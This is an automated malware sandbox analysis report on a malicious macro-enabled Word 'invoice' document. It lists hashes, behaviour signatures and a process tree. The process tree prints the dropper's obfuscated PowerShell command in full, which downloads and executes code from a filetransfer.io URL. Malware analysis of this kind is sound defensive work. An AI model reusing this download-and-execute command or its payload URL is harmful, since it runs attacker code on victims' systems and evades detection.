Analysis

  • max time kernel
    245s
  • max time network
    30s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    07-04-2023 22:52

General

  • Target

    INVOICE PACKAGE LINK TO DOWNLOAD.docm

  • Size

    16KB

  • MD5

    f2d0c66b801244c059f636d08a474079

  • SHA1

    c62129fff128817b5af62aa0051c082f9992112e

  • SHA256

    08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873

  • SHA512

    5283b2c228d6bdfe5d942f0a318ecd7e251e8a78d1451dc825f05e35d5e07a362e04c8777f63761b13bc672e76391cdc11be5e86ae4a260715e3e5a5cd2f305d

  • SSDEEP

    384:/iMIoinwt9VRFPZ1AZy8WNxt/ZtNN6wyMDv6js2ZzoP6Yv:/7u651AQrxllN6wyMOAOUPPv

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://filetransfer.io/data-package/UR2whuBv/download

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INVOICE PACKAGE LINK TO DOWNLOAD.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1760
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1212
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1920

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      cc5257542db788a587c63cca18010a39

      SHA1

      1f93e043464b1119fd926c9d1fde5d5db9e69a49

      SHA256

      79eeb0de117c35d93213c53013a5d029f657fac2d79cf742d44dd5d4e6e7a7c2

      SHA512

      9d7b26e9e1c7474ea7a597fc2e0224a577997649de7732ae6ce1ea251acc344f3cc3eff8fbcbe351db76192a3261fffe2396dd966fb17b3ff12f73e72588a905

    • memory/1212-63-0x0000000002670000-0x00000000026B0000-memory.dmp
      Filesize

      256KB

    • memory/1212-64-0x0000000002670000-0x00000000026B0000-memory.dmp
      Filesize

      256KB

    • memory/1760-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1760-57-0x0000000000420000-0x0000000000520000-memory.dmp
      Filesize

      1024KB

    • memory/1760-58-0x0000000000420000-0x0000000000520000-memory.dmp
      Filesize

      1024KB

    • memory/1760-86-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB